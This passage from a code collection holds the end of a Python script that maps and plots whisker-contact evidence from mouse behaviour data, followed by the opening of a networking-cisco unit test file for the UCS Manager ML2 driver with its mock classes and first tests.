consensus_edge_summary = pandas.read_pickle(
os.path.join(params['scaling_dir'], 'consensus_edge_summary'))
# ces to plot
cv_ces = consensus_edge_summary.xs(50, level='stepper_pos').max(level='row')
cc_ces = consensus_edge_summary.xs(150, level='stepper_pos').max(level='row')
all_ces = consensus_edge_summary.max(level='row')
# fillna for transparent plotting
cv_ces[cv_ces == 0] = np.nan
cc_ces[cc_ces == 0] = np.nan
all_ces[all_ces == 0] = np.nan
## Load data
C2_whisk_cycles = pandas.read_pickle(
os.path.join(params['patterns_dir'], 'big_C2_tip_whisk_cycles'))
big_cycle_features = pandas.read_pickle(
os.path.join(params['patterns_dir'], 'big_cycle_features'))
# This is just to plot follicle position
mean_follicle = pandas.read_pickle(
os.path.join(params['patterns_dir'], 'mean_follicle'))
# Transform follicle
transformed_mean_follicle = my.misc.transform(
mean_follicle, transformation_df).mean(level='whisker')
## Load the original features for plotting
# Need the original bins ('analysis_bin') to interpret the weights
ouf = pandas.read_pickle(os.path.join(params['logreg_dir'],
'obliviated_unaggregated_features_with_bin'))
# Insert mouse and task levels into features
ouf = my.misc.insert_mouse_and_task_levels(
ouf, mouse2task, level=0, sort=True)
# Add a new bin for this analysis
bin_edges_frames = np.linspace(-300, 100, 5)
bin_centers_frames = (bin_edges_frames[1:] + bin_edges_frames[:-1]) / 2.0
bin_ser = pandas.cut(
C2_whisk_cycles['peak_frame_wrt_rwin'],
bin_edges_frames, labels=False, right=True).rename('bin')
# Append bin_ser to index
idxdf = ouf.index.to_frame().reset_index(drop=True)
idxdf = idxdf.join(bin_ser, on=['session', 'trial', 'cycle'])
idxdf['bin'] = idxdf['bin'].fillna(-1).astype(np.int)
ouf.index = pandas.MultiIndex.from_frame(idxdf)
# Drop null bins and reorder levels
ouf = ouf.drop(-1, level='bin')
ouf = ouf.reorder_levels(
['task', 'mouse', 'session', 'trial', 'bin', 'analysis_bin', 'cycle']
).sort_index()
# Extract features of interest
contact_binarized = ouf['contact_binarized']
anti_contact_count = ouf['anti_contact_count']
## Load results of main2a1
big_weights_part = pandas.read_pickle('big_weights_part')
# Choose the reduced_model
reduced_model = 'contact_binarized+anti_contact_count+angle+anti_angle_max'
# Use these weights
use_weights = big_weights_part[False]['no_opto'][reduced_model]
# normalizing stuff for features that aren't raw
normalizing_mu = pandas.read_pickle(os.path.join(
params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model,
'big_normalizing_mu'))
normalizing_sigma = pandas.read_pickle(os.path.join(
params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model,
'big_normalizing_sigma'))
# Remove redundant
normalizing_mu = normalizing_mu.xs(
'rewside', level='decode_label').rename('mu').copy()
normalizing_sigma = normalizing_sigma.xs(
'rewside', level='decode_label').rename('sigma').copy()
## Extract the locations of each contact, to be weighted by weights
# Extract contact presence and angle onto the columns, one row per contact
stacked_contacts = ouf[
['anti_angle_max', 'anti_contact_count', 'contact_binarized', 'angle']
].stack('label')
# Drop the rows that have neither anti- nor actual contact
stacked_contacts = stacked_contacts.loc[
(stacked_contacts['anti_contact_count'] != 0) |
(stacked_contacts['contact_binarized'] != 0)
].copy()
# Join on whisk location (this is where it will be plotted)
# TODO: join on contact location, not peak location, but probably the same
to_join = big_cycle_features[
['peak_tip_x', 'peak_tip_y']].stack('whisker')
to_join.index = to_join.index.rename('label', level='whisker')
stacked_contacts = stacked_contacts.join(
to_join, on=['session', 'trial', 'cycle', 'label']).sort_index()
assert not stacked_contacts.index.duplicated().any()
## Apply the standardization to the non-raw features
# Only standardize these
standardized_features = ['anti_angle_max', 'angle']
# Extract and join on sigma and mu
to_standardize = stacked_contacts[
standardized_features].stack().rename('value').to_frame()
to_standardize = to_standardize.join(
normalizing_mu,
on=['session', 'metric', 'label', 'analysis_bin']
)
to_standardize = to_standardize.join(
normalizing_sigma,
on=['session', 'metric', 'label', 'analysis_bin']
)
to_standardize['standardized'] = to_standardize['value'].sub(
to_standardize['mu']).divide(to_standardize['sigma'])
# Drop ones that go to infinity
to_standardize = to_standardize.loc[
~np.isinf(to_standardize['standardized']) &
~to_standardize['standardized'].isnull() &
(to_standardize['standardized'].abs() < 10)
]
# Put back into stacked_contacts
# This will insert nulls where standardized angle was messed up
to_rejoin = to_standardize['standardized'].unstack('metric')
stacked_contacts = stacked_contacts.drop(standardized_features, axis=1)
stacked_contacts = stacked_contacts.join(to_rejoin)
## Transform contact location into the warped space
to_transform = stacked_contacts[['peak_tip_x', 'peak_tip_y']]
transformed_contacts = my.misc.transform(
to_transform, transformation_df).rename(
columns={'peak_tip_x': 'transformed_x', 'peak_tip_y': 'transformed_y'})
## Calculate the evidence of each contact
# Stack contacts again, so that each metric (e.g. angle) is a row
to_weight = stacked_contacts[
['anti_contact_count', 'contact_binarized', 'angle', 'anti_angle_max']
].stack().rename('value')
# Get decode_label alone on columns
flattened_weights = use_weights.stack().stack().stack().unstack('decode_label')
# Rename weights
flattened_weights = flattened_weights.rename(
columns={'choice': 'choice_weight', 'rewside': 'rewside_weight'})
# Join the weights onto the contacts
joined = to_weight.to_frame().join(
flattened_weights, on=flattened_weights.index.names)
#~ assert not joined.isnull().any().any()
assert len(joined) == len(to_weight)
# Shouldn't be any nulls because they would have been dropped by stacking
#~ assert not joined.isnull().any().any()
# Apply weight
joined['choice_evidence'] = joined['value'] * joined['choice_weight']
joined['rewside_evidence'] = joined['value'] * joined['rewside_weight']
evidence = joined[['choice_evidence', 'rewside_evidence']].copy()
# Sum over metric
evidence = evidence.sum(
level=[lev for lev in evidence.index.names if lev != 'metric']
)
## Concat data about contacts, their transformed position, and their evidence
contact_evidence = pandas.concat(
[stacked_contacts, transformed_contacts, evidence],
axis=1, sort=True, verify_integrity=True).sort_index(axis=1)
## Bin the contacts spatially
# How to bin
bins_x = np.linspace(-300, 300, 26)
bincenters_x = (bins_x[1:] + bins_x[:-1]) / 2.0
bins_y = np.linspace(-200, 400, 26)
bincenters_y = (bins_y[1:] + bins_y[:-1]) / 2.0
# Histogram the points
contact_evidence['bin_x'] = pandas.cut(
contact_evidence['transformed_x'],
bins=bins_x,
labels=False, right=True)
contact_evidence['bin_y'] = pandas.cut(
contact_evidence['transformed_y'],
bins=bins_y,
labels=False, right=True)
# Drop ones outside bins
# TODO: check this doesn't happen too much
contact_evidence = contact_evidence.dropna(subset=['bin_x', 'bin_y'])
contact_evidence['bin_x'] = contact_evidence['bin_x'].astype(np.int)
contact_evidence['bin_y'] = contact_evidence['bin_y'].astype(np.int)
# This is used to reindex various quantities below to evenly tile the frame
full_spatial_bincenter_midx = pandas.MultiIndex.from_product([
pandas.Index(range(len(bincenters_x)), name='bin_x'),
pandas.Index(range(len(bincenters_y)), name='bin_y'),
], names=['bin_x', 'bin_y'])
## Rename label to whisker
contact_evidence.index = contact_evidence.index.rename('whisker', level='label')
## Drop C0 for now
contact_evidence = contact_evidence.drop('C0', level='whisker')
## Split the evidence by contact vs no-contact whisks
# A contact occurred
yes_contact_evidence = contact_evidence.loc[
(contact_evidence['contact_binarized'] > 0) &
(contact_evidence['anti_contact_count'] == 0)
]
# No contact occurred
non_contact_evidence = contact_evidence.loc[
(contact_evidence['contact_binarized'] == 0) &
(contact_evidence['anti_contact_count'] > 0)
]
# On ~1.5% of whisks some double pump happened where both a contact
# and an anti-contact happened on the same whisker
# Those are dropped
# Add this as a level
contact_evidence = pandas.concat([
yes_contact_evidence, non_contact_evidence],
axis=0, sort=True, verify_integrity=True, keys=['yes', 'non'],
names=['contact_typ'])
## Aggregate the evidence by spatial bins
# Mean evidence
gobj = contact_evidence.groupby(
['contact_typ', 'task', 'mouse', 'whisker', 'bin_x', 'bin_y'])
aggregated_evidence_spatial = gobj[
['choice_evidence', 'rewside_evidence']].mean()
# Count the number of whisks that went into this mean
n_whisks = gobj.size().rename('n_whisks')
assert n_whisks.sum() == len(contact_evidence)
aggregated_evidence_spatial = aggregated_evidence_spatial.join(n_whisks)
# Calculate whisks per trial in each bin
# This is more appropriate for comparing across conditions
aggregated_evidence_spatial['n_whisks_per_trial'] = (
aggregated_evidence_spatial['n_whisks'].divide(
n_trials_per_mouse)).reorder_levels(
aggregated_evidence_spatial.index.names)
# Also normalize this, so that it sums to 1 over all spatial bins
# This is more appropriate for just looking at relative spatial distributions
normalizing_factor = aggregated_evidence_spatial['n_whisks'].sum(
level=[lev for lev in aggregated_evidence_spatial.index.names
if lev not in ['bin_x', 'bin_y']])
aggregated_evidence_spatial['norm_whisks_per_trial'] = (
aggregated_evidence_spatial['n_whisks'].divide(
normalizing_factor).reorder_levels(
aggregated_evidence_spatial.index.names)
)
## Aggregate the evidence by spatiotemporal bins
## TODO: normalize like above
# Mean evidence
gobj = contact_evidence.groupby(
['contact_typ', 'task', 'mouse', 'bin', 'whisker', 'bin_x', 'bin_y'])
aggregated_evidence_spatiotemporal = gobj[
['choice_evidence', 'rewside_evidence']].mean()
# Sum occupancy
occupancy = gobj.size().rename('n_contacts')
assert occupancy.sum() == len(contact_evidence)
aggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.join(occupancy)
# Normalize the occupancy to sum to 1 over the spatial bins
contacts_per_bin = aggregated_evidence_spatiotemporal['n_contacts'].sum(
level=[lev for lev in aggregated_evidence_spatiotemporal.index.names
if lev not in ['bin_x', 'bin_y']])
aggregated_evidence_spatiotemporal['occupancy'] = aggregated_evidence_spatiotemporal['n_contacts'].divide(
contacts_per_bin).reorder_levels(aggregated_evidence_spatiotemporal.index.names)
# Replace bin with bincenter
idxdf = aggregated_evidence_spatiotemporal.index.to_frame().reset_index(drop=True)
idxdf['frame_bin'] = idxdf['bin'].map(
pandas.Series(bin_centers_frames, index=range(len(bin_centers_frames))))
aggregated_evidence_spatiotemporal.index = pandas.MultiIndex.from_frame(
idxdf[['contact_typ', 'task', 'mouse', 'frame_bin',
'whisker', 'bin_x', 'bin_y']])
aggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.sort_index()
## Plot flags
PLOT_EDGE_SUMMARY_ONLY = True
PLOT_OCCUPANCY_DISCONLY = True
PLOT_EVIDENCE_DISCONLY_REWSIDEONLY = True
PLOT_EVIDENCE_DISCONLY_CHOICEONLY = True
## Plot
if PLOT_EDGE_SUMMARY_ONLY:
## Simple single axis with edge summary, for demonstration
# Figure handle
f, ax = plt.subplots(figsize=(3, 2.5))
f.subplots_adjust(left=0, right=1, bottom=0, top=1)
# Plot edge summary
extras.plot_warped_edge_summary(
ax, cv_ces=cv_ces, cc_ces=cc_ces, typ='color_by_stimulus')
# Follicle
ax.plot(
[transformed_mean_follicle['x'].values.mean()],
[transformed_mean_follicle['y'].values.mean()],
marker='x', color='k', ls='none')
# Pretty
ax.axis('image')
ax.set_xlim((-300, 300))
ax.set_ylim((300, -200))
ax.set_xticks([])
ax.set_yticks([])
# Scale bar
# 2.7mm = 60px, so 45um per px, or 222.2px per 10mm
ax.plot([-200, -200+111.1], [275, 275], 'k-', lw=.8)
ax.text(-200 + 55.55, 275, '5 mm', ha='center', va='bottom', size=12)
# Save
f.savefig('PLOT_EDGE_SUMMARY_ONLY.svg')
f.savefig('PLOT_EDGE_SUMMARY_ONLY.png', dpi=300)
if PLOT_OCCUPANCY_DISCONLY:
## Parameters
# Metric to plot
metric_topl = 'norm_whisks_per_trial'
# Iterate over whisk type (rows of figure)
whisk_typ_l = ['yes', 'non']
# Do only discrimination
task = 'discrimination'
# Binning
mouse_thresh = 4
nwpt_thresh = .02
# Plotting
edge_alpha = .3
occupancy_vmin = 0
occupancy_vmax = .03
## Aggregrate
# Slice by task and group by whisk type
figure_gobj = aggregated_evidence_spatial.xs(
task, level='task').groupby(
'contact_typ')
## Make handles
f, axa = plt.subplots(
len(whisk_typ_l), 1,
figsize=(3, 6.5), sharex=True, sharey=True)
f.subplots_adjust(left=0, right=1, bottom=0, top=.925, hspace=.3)
## Iterate over whisk types (rows)
for whisk_typ, sub_ae in figure_gobj:
## Slice
# Droplevel
sub_ae = sub_ae.droplevel('contact_typ')
# Slice data (evidence)
axis_data = sub_ae[metric_topl]
# Get ax
ax = axa[
whisk_typ_l.index(whisk_typ)
]
# Set title
if whisk_typ == 'yes':
ax.set_title('whisks with contact\n(location)')
elif whisk_typ == 'non':
ax.set_title('whisks without contact\n(location)')
## Spatialize occupancy
# Mean over mice, separately by whisker
spatialized = axis_data.mean(
level=['whisker', 'bin_x', 'bin_y'])
# Combine to rgb
occupancy_rgb = extras.combine_whisker_occupancy_to_rgb(
spatialized, full_spatial_bincenter_midx,
bins_x, bins_y,
x_index=all_ces.columns, y_index=all_ces.index,
vmin=occupancy_vmin, vmax=occupancy_vmax)
## Calculate edge_data
edge_data = all_ces.values
# Mask the edge_data, so that it has no effect where it is null
# Actually, this just avoids warnings about null in normalizing
masked_edge_data = np.ma.masked_array(
edge_data, np.isnan(edge_data))
# Normalize edge data to (0, 1) and colormap in black and white
# This replaces masked data with the colormap's "bad value"
edge_norm = matplotlib.colors.Normalize(vmin=0, vmax=1)
edge_data_rgba = plt.cm.gray_r(edge_norm(masked_edge_data))
## Blend occupancy_data and edge_data
blended_rgba = my.plot.alpha_blend_with_mask(
edge_data_rgba,
occupancy_rgb,
edge_alpha,
masked_edge_data.mask,
)
## Plot
im = my.plot.imshow(
blended_rgba, ax=ax,
x=all_ces.columns.values, y=all_ces.index.values)
## Pretty
# Plot follicle and ellipses
extras.plot_follicle_and_ellipses(
ax, transformed_mean_follicle, label_ellipses=True)
# Limits
extras.consistent_limits(ax)
f.savefig('PLOT_OCCUPANCY_DISCONLY.svg')
f.savefig('PLOT_OCCUPANCY_DISCONLY.png', dpi=300)
if PLOT_EVIDENCE_DISCONLY_REWSIDEONLY:
## Parameters
# Metric to plot
metric_topl = 'rewside_evidence'
# Iterate over whisk type (rows of figure)
whisk_typ_l = ['yes', 'non']
# Do only discrimination
task = 'discrimination'
# Binning
mouse_thresh = 4
nwpt_thresh = .02
# Plotting
edge_alpha = .3
evidence_vmin = -1
evidence_vmax = 1
## Aggregrate
# Slice by task and group by whisk type
figure_gobj = aggregated_evidence_spatial.xs(
task, level='task').groupby(
'contact_typ')
## Make handles
f, axa = plt.subplots(
len(whisk_typ_l), 1,
figsize=(4.25, 6.5), sharex=True, sharey=True)
f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)
# Axis for colorbar
cb_ax = f.add_axes((.77, .27, .03, .4))
cb = f.colorbar(
matplotlib.cm.ScalarMappable(
matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),
cmap=plt.cm.RdBu_r), cax=cb_ax)
cb.set_ticks((evidence_vmin, 0, evidence_vmax))
cb.ax.tick_params(labelsize=12)
## Iterate over whisk types (rows)
for whisk_typ, sub_ae in figure_gobj:
## Slice
# Droplevel
sub_ae = sub_ae.droplevel('contact_typ')
# Slice data (evidence)
axis_data = sub_ae[metric_topl]
# Get ax
ax = axa[
whisk_typ_l.index(whisk_typ)
]
# Set title
if whisk_typ == 'yes':
ax.set_title('whisks with contact\n(evidence)')
elif whisk_typ == 'non':
ax.set_title('whisks without contact\n(evidence)')
## Identify spatial bins with enough whisks to be worth plotting
keep_mask = extras.threshold_bins_by_n_whisks(
sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)
## Spatialize evidence
evidence_data = extras.spatialize_evidence(
axis_data, keep_mask, full_spatial_bincenter_midx,
bins_x, bins_y,
x_index=all_ces.columns, y_index=all_ces.index,
)
# Use only raw data
evidence_data = evidence_data.values
## Calculate edge_data
edge_data = all_ces.values
# Mask the edge_data, so that it has no effect where it is null
# Actually, this just avoids warnings about null in normalizing
masked_edge_data = np.ma.masked_array(
edge_data, np.isnan(edge_data))
## Normalize and blend plot
extras.normalize_and_blend_plot(
masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,
evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,
x_index=all_ces.columns.values, y_index=all_ces.index.values,
)
## Pretty
# Plot follicle and ellipses
extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)
# Limits
extras.consistent_limits(ax)
## Save
f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.svg')
f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.png', dpi=300)
if PLOT_EVIDENCE_DISCONLY_CHOICEONLY:
## Parameters
# Metric to plot
metric_topl = 'choice_evidence'
# Iterate over whisk type (rows of figure)
whisk_typ_l = ['yes', 'non']
# Do only discrimination
task = 'discrimination'
# Binning
mouse_thresh = 4
nwpt_thresh = .02
# Plotting
edge_alpha = .3
evidence_vmin = -.5
evidence_vmax = .5
## Aggregrate
# Slice by task and group by whisk type
figure_gobj = aggregated_evidence_spatial.xs(
task, level='task').groupby(
'contact_typ')
## Make handles
f, axa = plt.subplots(
len(whisk_typ_l), 1,
figsize=(4.25, 6.5), sharex=True, sharey=True)
f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)
# Axis for colorbar
cb_ax = f.add_axes((.77, .27, .03, .4))
cb = f.colorbar(
matplotlib.cm.ScalarMappable(
matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),
cmap=plt.cm.RdBu_r), cax=cb_ax)
cb.set_ticks((evidence_vmin, 0, evidence_vmax))
cb.ax.tick_params(labelsize=12)
## Iterate over whisk types (rows)
for whisk_typ, sub_ae in figure_gobj:
## Slice
# Droplevel
sub_ae = sub_ae.droplevel('contact_typ')
# Slice data (evidence)
axis_data = sub_ae[metric_topl]
# Get ax
ax = axa[
whisk_typ_l.index(whisk_typ)
]
# Set title
if whisk_typ == 'yes':
ax.set_title('whisks with contact\n(evidence)')
elif whisk_typ == 'non':
ax.set_title('whisks without contact\n(evidence)')
## Identify spatial bins with enough whisks to be worth plotting
keep_mask = extras.threshold_bins_by_n_whisks(
sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)
## Spatialize evidence
evidence_data = extras.spatialize_evidence(
axis_data, keep_mask, full_spatial_bincenter_midx,
bins_x, bins_y,
x_index=all_ces.columns, y_index=all_ces.index,
)
# Use only raw data
evidence_data = evidence_data.values
## Calculate edge_data
edge_data = all_ces.values
# Mask the edge_data, so that it has no effect where it is null
# Actually, this just avoids warnings about null in normalizing
masked_edge_data = np.ma.masked_array(
edge_data, np.isnan(edge_data))
## Normalize and blend plot
extras.normalize_and_blend_plot(
masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,
evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,
x_index=all_ces.columns.values, y_index=all_ces.index.values,
)
## Pretty
# Plot follicle and ellipses
extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)
# Limits
extras.consistent_limits(ax)
## Save
f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.svg')
f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.png', dpi=300)
plt.show()
| 31.338603
| 106
| 0.68616
|
4a07d9cf9dc8c2e7f0d63fb5fbeb352e3eda6e73
| 50,208
|
py
|
Python
|
networking_cisco/tests/unit/ml2/drivers/cisco/ucsm/test_cisco_ucsm_driver.py
|
Tehsmash/networking-cisco
|
fdbd79a832fe090f3c4c7bd7a4f0ec0c349d4d16
|
[
"Apache-2.0"
] | null | null | null |
networking_cisco/tests/unit/ml2/drivers/cisco/ucsm/test_cisco_ucsm_driver.py
|
Tehsmash/networking-cisco
|
fdbd79a832fe090f3c4c7bd7a4f0ec0c349d4d16
|
[
"Apache-2.0"
] | null | null | null |
networking_cisco/tests/unit/ml2/drivers/cisco/ucsm/test_cisco_ucsm_driver.py
|
Tehsmash/networking-cisco
|
fdbd79a832fe090f3c4c7bd7a4f0ec0c349d4d16
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from neutron.tests.unit import testlib_api
from networking_cisco.backwards_compatibility import ml2_api as api
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import (
mech_cisco_ucsm as md)
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import config as conf
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import constants as const
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import exceptions
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import ucsm_db
from networking_cisco.plugins.ml2.drivers.cisco.ucsm import ucsm_network_driver
from networking_cisco.tests.unit.ml2.drivers.cisco.ucsm import (
test_cisco_ucsm_common as mocked)
UCSM_IP_ADDRESS_1 = '1.1.1.1'
UCSM_IP_ADDRESS_2 = '2.2.2.2'
VNIC_NORMAL = 'normal'
VNIC_DIRECT = 'direct'
VNIC_MACVTAP = 'macvtap'
VNIC_TYPES = [VNIC_NORMAL, VNIC_DIRECT, VNIC_MACVTAP]
SRIOV_VNIC_TYPES = [VNIC_DIRECT, VNIC_MACVTAP]
SUPPORTED_PCI_DEVS = ["1137:0071", "8086:10c9"]
NETWORK_ID_1 = 1001
NETWORK_NAME = 'test-network'
VLAN_ID_1 = 100
VLAN_ID_2 = 101
PORT_STATE_ACTIVE = bc.constants.PORT_STATUS_ACTIVE
NETWORK_TYPE = 'vlan'
NETWORK_ID = 'test-network'
PORT_NAME = 'port1'
PORT_NAME2 = 'port2'
PORT_ID = '100001'
PORT_ID2 = '100002'
HOST1 = 'Hostname1'
HOST2 = 'Hostname2'
PCI_INFO_BAD_NIC = '1111:2222'
PCI_INFO_INVALID = '1111'
UCSM_DRIVER = ('neutron.plugins.ml2.drivers.cisco.ucsm.'
'ucsm_network_driver.CiscoUcsmDriver')
VLAN_SEGMENT = {api.ID: 'vlan_segment_id',
api.NETWORK_TYPE: 'vlan',
api.PHYSICAL_NETWORK: 'test_physnet',
api.SEGMENTATION_ID: VLAN_ID_1}
VXLAN_SEGMENT = {api.ID: 'vlan_segment_id',
api.NETWORK_TYPE: 'vxlan',
api.PHYSICAL_NETWORK: 'test_physnet',
api.SEGMENTATION_ID: VLAN_ID_1}
VLAN_SEGMENTS_BAD = {api.ID: 'vlan_segment_id',
api.NETWORK_TYPE: 'vlan',
api.PHYSICAL_NETWORK: 'fake_physnet',
api.SEGMENTATION_ID: VLAN_ID_2}
VLAN_SEGMENTS_GOOD = [{api.ID: 'vlan_segment_id',
api.NETWORK_TYPE: 'vlan',
api.PHYSICAL_NETWORK: 'test_physnet',
api.SEGMENTATION_ID: VLAN_ID_2}]
UCSM_HOST_DICT = {HOST1: UCSM_IP_ADDRESS_1,
HOST2: UCSM_IP_ADDRESS_2}
PORT_PROFILE_1 = 'OS-PP-100'
class FakeNetworkContext(api.NetworkContext):
"""Network context for testing purposes only."""
def __init__(self, segments):
self._network_segments = segments
@property
def current(self):
return {'id': NETWORK_ID_1,
'name': NETWORK_NAME}
@property
def original(self):
return None
@property
def network_segments(self):
return self._network_segments
class FakePortContext(object):
"""Port context for testing purposes only."""
def __init__(self, name, port_id, vnic_type, profile,
network_context):
self._port = {
'status': None,
'id': port_id,
'name': name,
# set for _is_supported_deviceowner() to return True
'device_owner': bc.constants.DEVICE_OWNER_DHCP,
bc.portbindings.HOST_ID: HOST1,
bc.portbindings.VNIC_TYPE: vnic_type,
bc.portbindings.PROFILE: profile
}
self._network = network_context
self._segment = network_context.network_segments[0]
self.session = bc.get_writer_session()
@property
def current(self):
return self._port
@property
def original(self):
return None
@property
def network(self):
return self._network
@property
def segment(self):
return self._segment
@property
def bottom_bound_segment(self):
return self._segment
def set_binding(self, segment_id, vif_type, vif_details,
status=None):
self._bound_segment_id = segment_id
self._bound_vif_type = vif_type
self._bound_vif_details = vif_details
self._port['status'] = status
class FakeServiceProfile(object):
"""Fake Service Profile class for testing only."""
def __init__(self, service_profile):
self.sp = service_profile
self.pn_dn = 'org-root/ls-'
self.dn = 'org-root'
self.oper_src_templ_name = (
self.pn_dn + self.dn)
self.pn_dn = self.pn_dn + self.sp
def __iter__(self):
return self
def __next__(self):
return self
def next(self):
return self.__next__()
class FakeServer(object):
def __init__(self, server):
self.name = server
class FakeUcsmHandle(object):
"""Ucsm connection handle for testing purposes only."""
def __init__(self, port_profile=None, query_dn=None, invalid_classid=None):
self._port_profile = port_profile
self._query_dn = query_dn
self._invalid_classid = invalid_classid
self._times_called = 0
self.sp_list = ['org-root/ls-SP1']
self.sp_list_temp = []
def query_dn(self, dn):
self._times_called += 1
if self._invalid_classid:
return FakeServer('nope')
elif self._query_dn:
return self._query_dn
elif dn == 'org-root/ls-SP1':
return FakeServer(HOST1)
elif self._times_called == 1:
return None
elif self._times_called == 2:
raise Exception("Port profile still in use by VMs.")
else:
return self._port_profile
def query_classid(self, class_id):
if self._invalid_classid:
self.sp_list_temp = [FakeServiceProfile('nope'),
FakeServiceProfile('nope')]
else:
self.sp_list_temp = [FakeServiceProfile('SP1'),
FakeServiceProfile('SP2')]
return self.sp_list_temp
def remove_mo(self, p_profile):
self._port_profile = None
def commit(self):
return
def logout(self):
return
class TestCiscoUcsmMechDriver(testlib_api.SqlTestCase,
mocked.ConfigMixin):
"""Unit tests for Cisco ML2 UCS Manager MD."""
def setUp(self):
"""Sets up mock Ucs Sdk."""
super(TestCiscoUcsmMechDriver, self).setUp()
self.set_up_mocks()
def new_ucsm_driver_init(mech_instance):
mech_instance.ucsmsdk = None
mech_instance.handles = {}
mech_instance.supported_sriov_vnic_types = SRIOV_VNIC_TYPES
mech_instance.supported_pci_devs = SUPPORTED_PCI_DEVS
mech_instance.ucsm_host_dict = UCSM_HOST_DICT
mech_instance.ucsm_conf = conf.UcsmConfig()
mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
'__init__',
new=new_ucsm_driver_init).start()
self.mech_driver = md.CiscoUcsmMechanismDriver()
self.mech_driver.initialize()
self.vif_type = const.VIF_TYPE_802_QBH
self.db = ucsm_db.UcsmDbModel()
self.ucsm_driver = ucsm_network_driver.CiscoUcsmDriver()
self.ucsm_driver.ucsm_db = ucsm_db.UcsmDbModel()
self.ucsm_config = conf.UcsmConfig()
def _create_network_context(self):
segment = {api.SEGMENTATION_ID: "",
api.NETWORK_TYPE: "",
}
segment[api.SEGMENTATION_ID] = VLAN_ID_1
segment[api.NETWORK_TYPE] = 'vlan'
network_context = FakeNetworkContext([VLAN_SEGMENT])
return network_context
def _create_port_context_vmfex(self):
"""Creates port context with valid VM-FEX vendor info."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def _create_port_context_bad(self):
"""Creates port context with badly formed vendor info."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': PCI_INFO_BAD_NIC}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def _create_port_context_sriov(self):
"""Creates port context with valid SR-IOV vendor info."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_MACVTAP
profile = {'pci_vendor_info': const.PCI_INFO_INTEL_82599}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def _create_port_context_normal(self):
"""Creates port context with Normal vnic type."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_NORMAL
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def test_parse_pci_vendor_config(self):
"""Verifies parsing of both good and bad pci vendor config."""
vendor1 = PCI_INFO_INVALID
vendor2 = const.PCI_INFO_INTEL_82599
self.assertNotIn(vendor1, self.ucsm_driver.supported_pci_devs)
self.assertIn(vendor2, self.ucsm_driver.supported_pci_devs)
def test_port_supported_deviceowner(self):
"""Verifies detection of supported set of device owners for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
supported_owners = [bc.constants.DEVICE_OWNER_ROUTER_HA_INTF,
bc.constants.DEVICE_OWNER_DHCP,
'compute:nova']
for owner in supported_owners:
port['device_owner'] = owner
self.assertTrue(self.mech_driver._is_supported_deviceowner(port))
def test_port_unsupported_deviceowner(self):
"""Verifies detection of unsupported device owners for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
unsupported_owners = [bc.constants.DEVICE_OWNER_ROUTER_INTF,
bc.constants.DEVICE_OWNER_ROUTER_GW,
bc.constants.DEVICE_OWNER_FLOATINGIP,
bc.constants.DEVICE_OWNER_ROUTER_SNAT,
bc.constants.DEVICE_OWNER_LOADBALANCER,
bc.constants.DEVICE_OWNER_LOADBALANCERV2,
'controller:foobar']
for owner in unsupported_owners:
port['device_owner'] = owner
self.assertFalse(self.mech_driver._is_supported_deviceowner(port))
def test_port_supported_status(self):
"""Verifies detection of supported status values for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
port['status'] = bc.constants.PORT_STATUS_ACTIVE
self.assertTrue(self.mech_driver._is_status_active(port))
def test_port_unsupported_status(self):
"""Verifies detection of unsupported status values for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
unsupported_states = [bc.constants.PORT_STATUS_BUILD,
bc.constants.PORT_STATUS_DOWN,
